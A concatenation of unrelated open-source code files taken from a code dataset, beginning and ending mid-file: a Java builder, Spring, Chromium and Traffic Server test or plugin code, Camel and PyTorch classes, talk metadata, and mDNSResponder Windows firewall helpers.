/**
* Set the length of the std error file in bytes if there was one.
*
* @param stdErrSize The length of the std error file in bytes
* @return This builder object
*/
public Builder withStdErrSize(final long stdErrSize) {
this.bStdErrSize = Math.max(stdErrSize, 0L);
return this;
}
/**
* Create a new immutable {@link JobProcessResult} instance based on the current contents of this builder.
*
* @return A {@link JobProcessResult} instance
*/
public JobProcessResult build() {
return new JobProcessResult(this);
}
}
}
| 1,726 |
568 | <reponame>kayleyang/jim-framework<filename>jim-framework-cloud-registry/src/main/java/com/jim/framework/cloud/registry/RegistryApplication.java
package com.jim.framework.cloud.registry;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.builder.SpringApplicationBuilder;
import org.springframework.cloud.netflix.eureka.server.EnableEurekaServer;
@SpringBootApplication
@EnableEurekaServer
public class RegistryApplication {
public static void main(String[] args) {
new SpringApplicationBuilder(RegistryApplication.class).web(true).run(args);
}
}
| 178 |
4,036 | <reponame>vadi2/codeql
enum Type { S, I };
struct Entry {
char* name;
Type t;
char* s;
int i;
};
union Value {
char* s;
int i;
};
struct EntryWithMethod: Entry {
int getAsInt() {
return i;
}
};
void myFunction()
{
union MyLocalUnion {
int i;
float f;
};
}
class MyClass
{
public:
union MyNestedUnion {
int i;
float f;
};
};
| 168 |
14,668 | // Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/page_load_metrics/observers/prefetch_proxy_page_load_metrics_observer.h"
#include <memory>
#include "base/command_line.h"
#include "base/test/metrics/histogram_tester.h"
#include "build/build_config.h"
#include "chrome/browser/ui/browser.h"
#include "chrome/test/base/in_process_browser_test.h"
#include "chrome/test/base/ui_test_utils.h"
#include "components/data_reduction_proxy/core/common/data_reduction_proxy_switches.h"
#include "components/ukm/test_ukm_recorder.h"
#include "content/public/test/browser_test.h"
#include "content/public/test/prerender_test_util.h"
#include "net/dns/mock_host_resolver.h"
#include "net/http/http_request_headers.h"
#include "net/http/http_status_code.h"
#include "net/test/embedded_test_server/embedded_test_server.h"
#include "net/test/embedded_test_server/embedded_test_server_connection_listener.h"
#include "net/test/embedded_test_server/http_request.h"
#include "net/test/embedded_test_server/http_response.h"
#include "services/metrics/public/cpp/ukm_builders.h"
#include "services/metrics/public/cpp/ukm_source.h"
#include "testing/gtest/include/gtest/gtest.h"
class PrefetchProxyPageLoadMetricsObserverBrowserTest
: public InProcessBrowserTest {
public:
PrefetchProxyPageLoadMetricsObserverBrowserTest() = default;
~PrefetchProxyPageLoadMetricsObserverBrowserTest() override = default;
void SetUpOnMainThread() override {
InProcessBrowserTest::SetUpOnMainThread();
host_resolver()->AddRule("*", "127.0.0.1");
embedded_test_server()->ServeFilesFromSourceDirectory(
"chrome/test/data/subresource_loading");
ASSERT_TRUE(embedded_test_server()->Start());
ukm_recorder_ = std::make_unique<ukm::TestAutoSetUkmRecorder>();
}
void NavigateTo(const GURL& url) {
ASSERT_TRUE(ui_test_utils::NavigateToURL(browser(), url));
base::RunLoop().RunUntilIdle();
}
void NavigateToOriginPath(const std::string& path) {
ASSERT_TRUE(ui_test_utils::NavigateToURL(
browser(), embedded_test_server()->GetURL("origin.com", path)));
base::RunLoop().RunUntilIdle();
}
void NavigateAway() {
ASSERT_TRUE(
ui_test_utils::NavigateToURL(browser(), GURL(url::kAboutBlankURL)));
base::RunLoop().RunUntilIdle();
}
void VerifyNoUKM() {
auto entries = ukm_recorder_->GetEntriesByName(
ukm::builders::PrefetchProxy::kEntryName);
EXPECT_TRUE(entries.empty());
}
void VerifyUKMEntry(const std::string& metric_name,
absl::optional<int64_t> expected_value) {
auto entries = ukm_recorder_->GetEntriesByName(
ukm::builders::PrefetchProxy::kEntryName);
ASSERT_EQ(1U, entries.size());
const auto* entry = entries.front();
ukm_recorder_->ExpectEntrySourceHasUrl(
entry, embedded_test_server()->GetURL("origin.com", "/index.html"));
const int64_t* value =
ukm::TestUkmRecorder::GetEntryMetric(entry, metric_name);
EXPECT_EQ(value != nullptr, expected_value.has_value());
if (!expected_value.has_value())
return;
EXPECT_EQ(*value, expected_value.value());
}
GURL GetOriginURL(const std::string& path) {
return embedded_test_server()->GetURL("origin.com", path);
}
private:
std::unique_ptr<ukm::TestAutoSetUkmRecorder> ukm_recorder_;
};
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverBrowserTest,
BeforeFCPPlumbing) {
base::HistogramTester histogram_tester;
NavigateToOriginPath("/index.html");
NavigateAway();
histogram_tester.ExpectUniqueSample(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 2,
1);
}
// TODO(http://crbug.com/1025737) Flaky on Mac.
#if defined(OS_MAC)
#define MAYBE_HistoryPlumbing DISABLED_HistoryPlumbing
#else
#define MAYBE_HistoryPlumbing HistoryPlumbing
#endif
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverBrowserTest,
MAYBE_HistoryPlumbing) {
base::HistogramTester histogram_tester;
NavigateToOriginPath("/index.html");
NavigateAway();
histogram_tester.ExpectUniqueSample(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", false, 1);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.DaysSinceLastVisitToOrigin", 0);
// Revisit and expect a 0 days-ago entry.
NavigateToOriginPath("/index.html");
NavigateAway();
histogram_tester.ExpectBucketCount(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", true, 1);
histogram_tester.ExpectBucketCount(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", false, 1);
histogram_tester.ExpectUniqueSample(
"PageLoad.Clients.SubresourceLoading.DaysSinceLastVisitToOrigin", 0, 1);
}
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverBrowserTest,
RecordNothingOnUntrackedPage) {
base::HistogramTester histogram_tester;
NavigateAway();
NavigateAway();
VerifyNoUKM();
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.DaysSinceLastVisitToOrigin", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Cached", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 0);
}
class PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest
: public PrefetchProxyPageLoadMetricsObserverBrowserTest {
public:
PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest()
: prerender_helper_(base::BindRepeating(
&PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest::
GetWebContents,
base::Unretained(this))) {}
~PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest() override =
default;
PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest(
const PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest&) = delete;
PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest& operator=(
const PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest&) = delete;
void SetUp() override {
prerender_helper_.SetUp(embedded_test_server());
PrefetchProxyPageLoadMetricsObserverBrowserTest::SetUp();
}
void SetUpOnMainThread() override {
PrefetchProxyPageLoadMetricsObserverBrowserTest::SetUpOnMainThread();
}
content::test::PrerenderTestHelper& prerender_test_helper() {
return prerender_helper_;
}
content::WebContents* GetWebContents() {
return browser()->tab_strip_model()->GetActiveWebContents();
}
private:
content::test::PrerenderTestHelper prerender_helper_;
};
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest,
PrerenderingShouldNotRecordMetrics) {
base::HistogramTester histogram_tester;
GURL initial_url = embedded_test_server()->GetURL("/redirect_to_index.html");
ASSERT_TRUE(ui_test_utils::NavigateToURL(browser(), initial_url));
// Load a prerender page and prerendering should not increase the total count.
GURL prerender_url = embedded_test_server()->GetURL("/index.html");
int host_id = prerender_test_helper().AddPrerender(prerender_url);
content::test::PrerenderHostObserver host_observer(*GetWebContents(),
host_id);
EXPECT_FALSE(host_observer.was_activated());
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Cached", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 0);
// Activate the prerender page.
prerender_test_helper().NavigatePrimaryPage(prerender_url);
EXPECT_TRUE(host_observer.was_activated());
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Cached", 1);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 1);
}
| 3,047 |
5,169 | <reponame>Ray0218/Specs<filename>Specs/DRGlyphLabel/0.1.0/DRGlyphLabel.podspec.json<gh_stars>1000+
{
"name": "DRGlyphLabel",
"version": "0.1.0",
"summary": "A simple library that allows you to create labels with bitmap fonts in UIKit",
"homepage": "https://github.com/darrarski/DRGlyphLabel-iOS",
"license": "MIT",
"authors": {
"Darrarski": "<EMAIL>"
},
"source": {
"git": "https://github.com/darrarski/DRGlyphLabel-iOS.git",
"tag": "0.1.0"
},
"platforms": {
"ios": "7.0"
},
"source_files": "DRGlyphLabel",
"requires_arc": true
}
| 251 |
1,351 | /**
@file
@brief Plugin to verify the ordering of session and transaction start and
close hooks is correct. Keeps track of statistics about the number of
hooks tracked that are caught and of the number of errors encountered.
@section license License
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <iostream>
#include <set>
#include <sstream>
#include <cstdlib> // for abort
#include <ts/ts.h> // for debug
#include <cinttypes> // for PRIu64
#include <cstring>
// debug messages viewable by setting 'proxy.config.diags.debug.tags'
// in 'records.config'
// debug messages during one-time initialization
static const char DEBUG_TAG_INIT[] = "ssntxnorder_verify.init";
// debug messages on every request serviced
static const char DEBUG_TAG_HOOK[] = "ssntxnorder_verify.hook";
static const char DEBUG_TAG_CLOSE[] = "ssntxnorder_verify.close";
// plugin registration info
static char plugin_name[] = "ssntxnorder_verify";
static char vendor_name[] = "Apache";
static char support_email[] = "<EMAIL>";
// List of started sessions, SSN_START seen, SSN_CLOSE not seen yet.
thread_local std::set<TSHttpSsn> started_ssns;
thread_local int ssn_balance = 0; // +1 on SSN_START, -1 on SSN_CLOSE
// Metadata for active transactions. Stored upon start to persist improper
// closing behavior.
typedef struct started_txn {
uint64_t id;
TSHttpTxn txnp;
TSHttpSsn ssnp; // enclosing session
started_txn(uint64_t id) : id(id) {} // used for lookup on id
started_txn(uint64_t id, TSHttpTxn txnp, TSHttpSsn ssnp) : id(id), txnp(txnp), ssnp(ssnp) {}
} started_txn;
// Comparator functor for transactions. Compare by ID.
struct txn_compare {
bool
operator()(const started_txn &lhs, const started_txn &rhs) const
{
return lhs.id < rhs.id;
}
};
// List of started transactions, TXN_START seen, TXN_CLOSE not seen yet.
thread_local std::set<started_txn, txn_compare> started_txns;
thread_local std::set<started_txn, txn_compare> closed_txns;
thread_local int txn_balance = 0; // +1 on TXN_START -1 on TXN_CLOSE
// Statistics provided by the plugin
static int stat_ssn_close = 0; // number of TS_HTTP_SSN_CLOSE hooks caught
static int stat_ssn_start = 0; // number of TS_HTTP_SSN_START hooks caught
static int stat_txn_close = 0; // number of TS_HTTP_TXN_CLOSE hooks caught
static int stat_txn_start = 0; // number of TS_HTTP_TXN_START hooks caught
static int stat_err = 0; // number of inaccuracies encountered
static int stat_test_done = 0; // Set to 1 when the test is done
// IPC information
static char *ctl_tag = plugin_name; // name is a convenient identifier
static const char ctl_dump[] = "dump"; // output active ssn/txn tables cmd
/**
This function is invoked upon TS_EVENT_LIFECYCLE_MSG. It outputs the
active SSN and TXN tables (the items that have not yet been closed).
Information displayed for transactions:
- TXN ID
- Enclosing SSN ID
- HTTP Protocol Version - 1.0 / 1.1 / 2.0 etc...
Information displayed for sessions:
- SSN ID
*/
static void
dump_tables()
{
TSDebug(DEBUG_TAG_HOOK, "Dumping active session and transaction tables.");
std::stringstream dump("");
dump << std::string(100, '+') << std::endl;
if (started_ssns.empty()) {
dump << "No active sessions could be found." << std::endl;
} else {
// Output for every active session
for (auto started_ssn : started_ssns) {
dump << "Session --> ID: " << started_ssn << std::endl;
}
}
if (started_txns.empty()) {
dump << "No active transactions could be found." << std::endl;
} else {
// Output for every active transaction
for (const auto &it : started_txns) {
dump << "Transaction --> ID: " << it.id << " ; Enclosing SSN ID: " << it.ssnp << " ;" << std::endl;
}
}
dump << std::string(100, '+') << std::endl;
std::cout << dump.str() << std::endl;
}
/**
This function is called on every request and logs session and transaction
start and close events. It is used upon initialization to install the hooks
to the corresponding events. Return value is irrelevant.
*/
static int
handle_order(TSCont contp, TSEvent event, void *edata)
{
TSHttpSsn ssnp; // session data
TSHttpTxn txnp; // transaction data
TSPluginMsg *msgp; // message data
// Find the event that happened
switch (event) {
case TS_EVENT_HTTP_SSN_CLOSE: // End of session
{
ssnp = reinterpret_cast<TSHttpSsn>(edata);
TSDebug(DEBUG_TAG_CLOSE, "event TS_EVENT_HTTP_SSN_CLOSE [ SSNID = %p ]", ssnp);
TSStatIntIncrement(stat_ssn_close, 1);
if (started_ssns.erase(ssnp) == 0) {
// No record existsted for this session
TSDebug(DEBUG_TAG_HOOK, "Session [ SSNID = %p ] closing was not previously started", ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
if (--ssn_balance < 0) {
TSDebug(DEBUG_TAG_HOOK, "More sessions have been closed than started.");
TSStatIntIncrement(stat_err, 1);
abort();
}
TSHttpSsnReenable(ssnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_HTTP_SSN_START: // Beginning of session
{
ssnp = reinterpret_cast<TSHttpSsn>(edata);
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_HTTP_SSN_START [ SSNID = %p ]", ssnp);
TSStatIntIncrement(stat_ssn_start, 1);
if (!started_ssns.insert(ssnp).second) {
// Insert failed. Session already existed in the record.
TSDebug(DEBUG_TAG_HOOK, "Session [ SSNID = %p ] has previously started.", ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
++ssn_balance;
TSHttpSsnReenable(ssnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_HTTP_TXN_CLOSE: // End of transaction
{
txnp = reinterpret_cast<TSHttpTxn>(edata);
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_HTTP_TXN_CLOSE [ TXNID = %" PRIu64 " ]", TSHttpTxnIdGet(txnp));
TSStatIntIncrement(stat_txn_close, 1);
std::set<started_txn>::iterator closed_txn = closed_txns.find(started_txn(TSHttpTxnIdGet(txnp)));
if (closed_txn != closed_txns.end()) {
// Double close?
TSStatIntIncrement(stat_err, 1);
abort();
}
closed_txns.insert(started_txn(TSHttpTxnIdGet(txnp)));
std::set<started_txn>::iterator current_txn = started_txns.find(started_txn(TSHttpTxnIdGet(txnp)));
if (current_txn != started_txns.end() && current_txn->id == TSHttpTxnIdGet(txnp)) {
// Transaction exists.
ssnp = current_txn->ssnp;
if (started_ssns.find(ssnp) == started_ssns.end()) {
// The session of the transaction was either not started, or was
// already closed.
TSDebug(DEBUG_TAG_HOOK,
"Transaction [ TXNID = %" PRIu64 " ] closing not in an "
"active session [ SSNID = %p ].",
current_txn->id, ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
started_txns.erase(current_txn); // Stop monitoring the transaction
} else {
// Transaction does not exists.
TSDebug(DEBUG_TAG_HOOK,
"Transaction [ TXNID = %" PRIu64 " ] closing not "
"previously started.",
TSHttpTxnIdGet(txnp));
TSStatIntIncrement(stat_err, 1);
abort();
}
if (--txn_balance < 0) {
TSDebug(DEBUG_TAG_HOOK, "More transactions have been closed than started.");
TSStatIntIncrement(stat_err, 1);
abort();
}
TSHttpTxnReenable(txnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_HTTP_TXN_START: // Beginning of transaction
{
txnp = reinterpret_cast<TSHttpTxn>(edata);
ssnp = TSHttpTxnSsnGet(txnp);
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_HTTP_TXN_START [ TXNID = %" PRIu64 " ]", TSHttpTxnIdGet(txnp));
TSStatIntIncrement(stat_txn_start, 1);
started_txn new_txn = started_txn(TSHttpTxnIdGet(txnp), txnp, ssnp);
if (started_ssns.find(ssnp) == started_ssns.end()) {
// Session of the transaction has not started.
TSDebug(DEBUG_TAG_HOOK,
"Transaction [ TXNID = %" PRIu64 " ] starting not in an "
"active session [ SSNID = %p ].",
new_txn.id, ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
if (!started_txns.insert(new_txn).second) {
// Insertion failed. Transaction has previously started.
TSDebug(DEBUG_TAG_HOOK, "Transaction [ TXNID = %" PRIu64 " ] has previously started.", new_txn.id);
TSStatIntIncrement(stat_err, 1);
abort();
}
++txn_balance;
TSHttpTxnReenable(txnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_LIFECYCLE_MSG: // External trigger, such as traffic_ctl
{
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_LIFECYCLE_MSG");
msgp = reinterpret_cast<TSPluginMsg *>(edata); // inconsistency
// Verify message is with the appropriate tag
if (!strcmp(ctl_tag, msgp->tag) && strncmp(ctl_dump, reinterpret_cast<const char *>(msgp->data), strlen(ctl_dump)) == 0) {
dump_tables();
} else {
TSContScheduleOnPool(contp, 0, TS_THREAD_POOL_NET);
}
break;
}
case TS_EVENT_IMMEDIATE:
TSStatIntIncrement(stat_test_done, 1);
break;
// Just release the lock for all other states and do nothing
default:
abort();
break;
}
return 0;
}
/**
Entry point for the plugin.
- Attaches global hooks for session start and close.
- Attaches global hooks for transaction start and close.
- Attaches lifecycle hook for communication through traffic_ctl
- Initializes all statistics as described in the README
*/
void
TSPluginInit(int argc, const char *argv[])
{
TSDebug(DEBUG_TAG_INIT, "initializing plugin");
TSPluginRegistrationInfo info;
info.plugin_name = plugin_name;
info.vendor_name = vendor_name;
info.support_email = support_email;
if (TSPluginRegister(&info) != TS_SUCCESS) {
TSDebug(DEBUG_TAG_HOOK, "[%s] Plugin registration failed. \n", plugin_name);
}
TSCont contp = TSContCreate(handle_order, TSMutexCreate());
if (contp == nullptr) {
// Continuation initialization failed. Unrecoverable, report and exit.
TSDebug(DEBUG_TAG_HOOK, "[%s] could not create continuation", plugin_name);
abort();
} else {
// Continuation initialization succeeded.
stat_ssn_start = TSStatCreate("ssntxnorder_verify.ssn.start", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_ssn_close = TSStatCreate("ssntxnorder_verify.ssn.close", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_txn_start = TSStatCreate("ssntxnorder_verify.txn.start", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_txn_close = TSStatCreate("ssntxnorder_verify.txn.close", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_err = TSStatCreate("ssntxnorder_verify.err", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_test_done = TSStatCreate("ssntxnorder_verify.test.done", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
// Add all hooks.
TSHttpHookAdd(TS_HTTP_SSN_START_HOOK, contp);
TSHttpHookAdd(TS_HTTP_SSN_CLOSE_HOOK, contp);
TSHttpHookAdd(TS_HTTP_TXN_START_HOOK, contp);
TSHttpHookAdd(TS_HTTP_TXN_CLOSE_HOOK, contp);
TSLifecycleHookAdd(TS_LIFECYCLE_MSG_HOOK, contp);
}
}
| 4,752 |
4,262 | <gh_stars>1000+
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.support.startup;
import org.apache.camel.StartupStep;
public class DefaultStartupStep implements StartupStep {
private final String type;
private final String name;
private final String description;
private final int id;
private final int parentId;
private final int level;
private final long time;
public DefaultStartupStep(String type, String name, String description, int id, int parentId, int level, long time) {
this.type = type;
this.name = name;
this.description = description;
this.id = id;
this.parentId = parentId;
this.level = level;
this.time = time;
}
@Override
public String getType() {
return type;
}
@Override
public String getName() {
return name;
}
@Override
public String getDescription() {
return description;
}
@Override
public int getId() {
return id;
}
@Override
public int getParentId() {
return parentId;
}
@Override
public int getLevel() {
return level;
}
@Override
public long getBeginTime() {
return time;
}
@Override
public void endStep() {
// noop
}
}
| 705 |
435 | {
"description": "<NAME> famously quipped that \u201cThe Web is 95% Typography.\u201d\nMost of the information we take in on the web is textual in nature. It\nbehooves us, as writers and curators of text, to know about the art and\nscience of presenting textual information.\n\nThis talk isn\u2019t about art, or science, but technique. Typesetting has a\nrich history, dating back to Mr. Gutenberg and his printing press.\nAlthough digital type is fairly mature by now, type on the web is still\nvery much in its infancy. We are only now gaining typographical controls\nthat the publishing industry has taken for granted these last 20 years.\nI'll be taking you on tour of the current state of type on the web: what\nwe can do today, and what we will be able to do tomorrow.\n\nSome highlights: \\_ A reintroduction to font-face and the nitty-gritty\ndetails of how it works \\_ Advanced typography with CSS3 font-features\n(http://caniuse.com/#feat=font-feature) \\_ Icon fonts, and semantic use\nthereof \\_ JavaScript tools like fittext.js and lettering.js\n",
"duration": 2077,
"recorded": "2014-05-14",
"speakers": [
"<NAME>"
],
"thumbnail_url": "https://i.ytimg.com/vi/LHqEKpcA6Mo/hqdefault.jpg",
"title": "Advanced Web Typography",
"videos": [
{
"type": "youtube",
"url": "https://www.youtube.com/watch?v=LHqEKpcA6Mo"
}
]
}
| 440 |
567 | <gh_stars>100-1000
import torch
import sys
from online import optimization, TensorList, operation
import math
class FactorizedConvProblem(optimization.L2Problem):
def __init__(self, training_samples: TensorList, y: TensorList, filter_reg: torch.Tensor, projection_reg, params, sample_weights: TensorList,
projection_activation, response_activation):
self.training_samples = training_samples
self.y = y
self.filter_reg = filter_reg
self.sample_weights = sample_weights
self.params = params
self.projection_reg = projection_reg
self.projection_activation = projection_activation
self.response_activation = response_activation
self.diag_M = self.filter_reg.concat(projection_reg)
def __call__(self, x: TensorList):
"""
Compute residuals
:param x: [filters, projection_matrices]
:return: [data_terms, filter_regularizations, proj_mat_regularizations]
"""
filter = x[:len(x)//2] # w2 in paper
P = x[len(x)//2:] # w1 in paper
# Do first convolution
compressed_samples = operation.conv1x1(self.training_samples, P).apply(self.projection_activation)
# Do second convolution
residuals = operation.conv2d(compressed_samples, filter, mode='same').apply(self.response_activation)
# Compute data residuals
residuals = residuals - self.y
residuals = self.sample_weights.sqrt().view(-1, 1, 1, 1) * residuals
# Add regularization for projection matrix
residuals.extend(self.filter_reg.apply(math.sqrt) * filter)
# Add regularization for projection matrix
residuals.extend(self.projection_reg.apply(math.sqrt) * P)
return residuals
def ip_input(self, a: TensorList, b: TensorList):
num = len(a) // 2 # Number of filters
a_filter = a[:num]
b_filter = b[:num]
a_P = a[num:]
b_P = b[num:]
# Filter inner product
# ip_out = a_filter.reshape(-1) @ b_filter.reshape(-1)
ip_out = operation.conv2d(a_filter, b_filter).view(-1)
# Add projection matrix part
# ip_out += a_P.reshape(-1) @ b_P.reshape(-1)
ip_out += operation.conv2d(a_P.view(1,-1,1,1), b_P.view(1,-1,1,1)).view(-1)
# Have independent inner products for each filter
return ip_out.concat(ip_out.clone())
def M1(self, x: TensorList):
return x / self.diag_M
class ConvProblem(optimization.L2Problem):
def __init__(self, training_samples: TensorList, y: TensorList, filter_reg: torch.Tensor, sample_weights: TensorList, response_activation):
self.training_samples = training_samples
self.y = y
self.filter_reg = filter_reg
self.sample_weights = sample_weights
self.response_activation = response_activation
def __call__(self, x: TensorList):
"""
Compute residuals
:param x: [filters]
:return: [data_terms, filter_regularizations]
"""
# Do convolution and compute residuals
residuals = operation.conv2d(self.training_samples, x, mode='same').apply(self.response_activation)
residuals = residuals - self.y
residuals = self.sample_weights.sqrt().view(-1, 1, 1, 1) * residuals
# Add regularization for projection matrix
residuals.extend(self.filter_reg.apply(math.sqrt) * x)
return residuals
def ip_input(self, a: TensorList, b: TensorList):
# return a.reshape(-1) @ b.reshape(-1)
# return (a * b).sum()
return operation.conv2d(a, b).view(-1)
| 1,531 |
341 | <reponame>codenotes/mDNAResponder
/* -*- Mode: C; tab-width: 4 -*-
*
* Copyright (c) 2003-2004 Apple Computer, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// <rdar://problem/4278931> Doesn't compile correctly with latest Platform SDK
#if !defined(_WIN32_DCOM)
# define _WIN32_DCOM
#endif
#include "Firewall.h"
#include <windows.h>
#include <crtdbg.h>
#include <netfw.h>
#include <objbase.h>
#include <oleauto.h>
static const int kMaxTries = 30;
static const int kRetrySleepPeriod = 1 * 1000; // 1 second
static OSStatus
mDNSFirewallInitialize(OUT INetFwProfile ** fwProfile)
{
INetFwMgr * fwMgr = NULL;
INetFwPolicy * fwPolicy = NULL;
int numRetries = 0;
HRESULT err = kNoErr;
_ASSERT(fwProfile != NULL);
*fwProfile = NULL;
// Use COM to get a reference to the firewall settings manager. This
// call will fail on anything other than XP SP2
err = CoCreateInstance( __uuidof(NetFwMgr), NULL, CLSCTX_INPROC_SERVER, __uuidof(INetFwMgr), (void**)&fwMgr );
require(SUCCEEDED(err) && ( fwMgr != NULL ), exit);
// Use the reference to get the local firewall policy
err = fwMgr->get_LocalPolicy(&fwPolicy);
require(SUCCEEDED(err) && ( fwPolicy != NULL ), exit);
// Use the reference to get the extant profile. Empirical evidence
// suggests that there is the potential for a race condition when a system
// service whose startup type is automatic calls this method.
// This is true even when the service declares itself to be dependent
// on the firewall service. Re-trying the method will succeed within
// a few seconds.
do
{
err = fwPolicy->get_CurrentProfile(fwProfile);
if (err)
{
Sleep(kRetrySleepPeriod);
}
}
while (err && (numRetries++ < kMaxTries));
require(SUCCEEDED(err), exit);
err = kNoErr;
exit:
// Release temporary COM objects
if (fwPolicy != NULL)
{
fwPolicy->Release();
}
if (fwMgr != NULL)
{
fwMgr->Release();
}
return err;
}
static void
mDNSFirewallCleanup
(
IN INetFwProfile * fwProfile
)
{
// Call Release on the COM reference.
if (fwProfile != NULL)
{
fwProfile->Release();
}
}
static OSStatus
mDNSFirewallAppIsEnabled
(
IN INetFwProfile * fwProfile,
IN const wchar_t * fwProcessImageFileName,
OUT BOOL * fwAppEnabled
)
{
BSTR fwBstrProcessImageFileName = NULL;
VARIANT_BOOL fwEnabled;
INetFwAuthorizedApplication * fwApp = NULL;
INetFwAuthorizedApplications* fwApps = NULL;
OSStatus err = kNoErr;
_ASSERT(fwProfile != NULL);
_ASSERT(fwProcessImageFileName != NULL);
_ASSERT(fwAppEnabled != NULL);
*fwAppEnabled = FALSE;
// Get the list of authorized applications
err = fwProfile->get_AuthorizedApplications(&fwApps);
require(SUCCEEDED(err) && ( fwApps != NULL ), exit);
fwBstrProcessImageFileName = SysAllocString(fwProcessImageFileName);
require_action( ( fwProcessImageFileName != NULL ) && ( SysStringLen(fwBstrProcessImageFileName) > 0 ), exit, err = kNoMemoryErr);
// Look for us
err = fwApps->Item(fwBstrProcessImageFileName, &fwApp);
if (SUCCEEDED(err) && ( fwApp != NULL ) )
{
// It's listed, but is it enabled?
err = fwApp->get_Enabled(&fwEnabled);
require(SUCCEEDED(err), exit);
if (fwEnabled != VARIANT_FALSE)
{
// Yes, it's enabled
*fwAppEnabled = TRUE;
}
}
err = kNoErr;
exit:
// Deallocate the BSTR
if ( fwBstrProcessImageFileName != NULL )
{
SysFreeString(fwBstrProcessImageFileName);
}
// Release the COM objects
if (fwApp != NULL)
{
fwApp->Release();
}
if (fwApps != NULL)
{
fwApps->Release();
}
return err;
}
static OSStatus
mDNSFirewallAddApp
(
IN INetFwProfile * fwProfile,
IN const wchar_t * fwProcessImageFileName,
IN const wchar_t * fwName
)
{
BOOL fwAppEnabled;
BSTR fwBstrName = NULL;
BSTR fwBstrProcessImageFileName = NULL;
INetFwAuthorizedApplication * fwApp = NULL;
INetFwAuthorizedApplications* fwApps = NULL;
OSStatus err = S_OK;
_ASSERT(fwProfile != NULL);
_ASSERT(fwProcessImageFileName != NULL);
_ASSERT(fwName != NULL);
// First check to see if the application is already authorized.
